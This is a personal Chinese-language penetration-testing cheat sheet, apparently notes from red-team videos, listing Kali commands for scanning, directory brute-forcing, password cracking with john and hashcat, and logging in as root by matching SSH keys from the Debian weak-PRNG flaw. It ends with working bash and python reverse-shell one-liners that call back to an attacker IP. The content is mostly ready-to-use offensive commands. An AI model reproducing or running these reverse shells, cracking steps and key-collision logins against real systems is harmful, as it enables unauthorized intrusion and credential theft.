kali常用命令总结

这是看B站红队笔记视频想记录的一些东西，放在这有时间多看几次。个人向，若有错误，请大伙见谅。

主机发现

nmap

nmap -sn x.x.x.x/24 //c段扫描

nmap --min-rate 10000 -p- 192.168.1.1 //以tcp协议10000速率扫描主机开放端口

nmap -sU --min-rate 10000 -p- 192.168.1.1 //指定usp协议10000速率扫描主机开放端口

nmap -sU --top-ports  192.168.1.1 //指定usp协议扫描常见主机开放端口

nmap -sT -sV -O -p22,80 192.168.1.1  //以Tcp协议探测目标靶机的22,80端口跑的服务、版本以及操作系统的类型

nmap --script=vuln -p22,80 192.168.1.1 //使用nmap漏洞脚本探测基本漏洞情况

目录爆破

gobuster

gobuster -dir -u http://192.168.1.1 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt //常规利用

gobuster dir -u http://192.168.1.1 -x rar,zip,sql,txt,back -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  //指定后缀格式进行目录爆破

dir

dirb http://192.168.1.1 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

wfuzz

密码破解

xxxjohn

        文件密码破解推荐使用xxxjohn工具，它可以利用加密文件的加密逻辑生成hash值，然后使用john工具进行破解。

        也有其他的破解方式，但这种破解方式的效率最高。

        例如：

                sudo zip2john temp.zip >temphash 

                sudo john temphash --wordlist=/usr/share/wordlists/rockyou.txt

       xxxjohn路径：/usr/bin/

john破解密文

        sudo john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashfile

hash加密类型识别

        hash-identifier

hashcat破解密文

        sage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]..

        hashcat -m 0 -a 0 "encryption_strings" /usr/share/wordlists/rockyou.txt

        注：-m 加密字符串的类型，0为MD5

               -a 攻击模式 

  0 | Straight
  1 | Combination
  3 | Brute-force
  6 | Hybrid Wordlist + Mask
  7 | Hybrid Mask + Wordlist
  9 | Association

 hydra

crackmapexec

linux公钥利用

       1、 登陆服务器后台的方式有两种：

                ①、基于口令，即用户名和密码的方式。

                ②、基于密钥和私钥的免密登陆方式。利用这种方式登陆时，在$USER_HOME/.ssh/（极少数可能这个路径会变动）目录下会存在一个公钥文件authorized_keys。

        2、获取到$USER_HOME/.ssh/authorized_keys里的公钥信息后，可以利用伪随机数生成器（PRNG）生成公钥和私钥的一一对应文件，然后利用获取到的公钥和生成器生成的公钥进行碰撞，若能碰撞成功则也相应获得私钥。

        ①kali机器上可直接执行searchsploit prng,然后将搜索出来的txt文件下载下来

        ②查看文件里的内容，使用步骤如下

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
            https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)

4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.

ⅰ：下载压缩包wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2

ⅱ：解压：tar -xvf 5622.tar.bz2

ⅲ：进入到解压后的路径，可以看到有二十多万个文件 

ⅳ ：利用获得的公钥进行搜索。一般取公钥的30~40个字符进行搜索，如果取的字符太长，搜索的时间太长；如果取的字符太短，可能搜索出多个结果。因为我在另一台靶机上设置了秘钥方式登陆，然后把公钥和私钥文件都拷贝到kali上，所以这里能够搜出来。如果是真实渗透或打野时，运气不一定会这么好地找得到对应的公钥文件。

      grep -n "AAAB3NzaC1yc2EAAAADAQABAAABAQDF6BWpO" *.pub

ⅴ ：然后再对比这两个文件的的公钥字符串是否一致，如果一致，则使用ssh进行登录

        sudo ssh -i 0002d5af29276c95a49dc2ab3b506707-23747 root@192.168.62.135

         成功！

未完待续

敏感文件查询

        当遇到文件包含漏洞而又不知道该查找哪些敏感文件时，可以参考以下项目中敏感文件库：

github的auto_wordlists项目：Auto_Wordlists/wordlists at main · carlospolop/Auto_Wordlists · GitHubhttps://github.com/carlospolop/Auto_Wordlists/tree/main/wordlists

反弹shell

 bash

 /bin/bash -c 'exec bash -i &>/dev/tcp/192.168.62.129/6666 <&1'
 /bin/bash -i >& /dev/tcp/192.168.62.129/8888 0>&1

python

sudo python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.62.129",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

python -c 'import os,socket,sys,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.62.129",8081));[os.dup2(s.fileno(),fd)for fd in (0,1,2)];pty.spawn("/bin/bash");'

 参考：

(7条消息) python反弹shell_反弹Shell小结_何普的博客-CSDN博客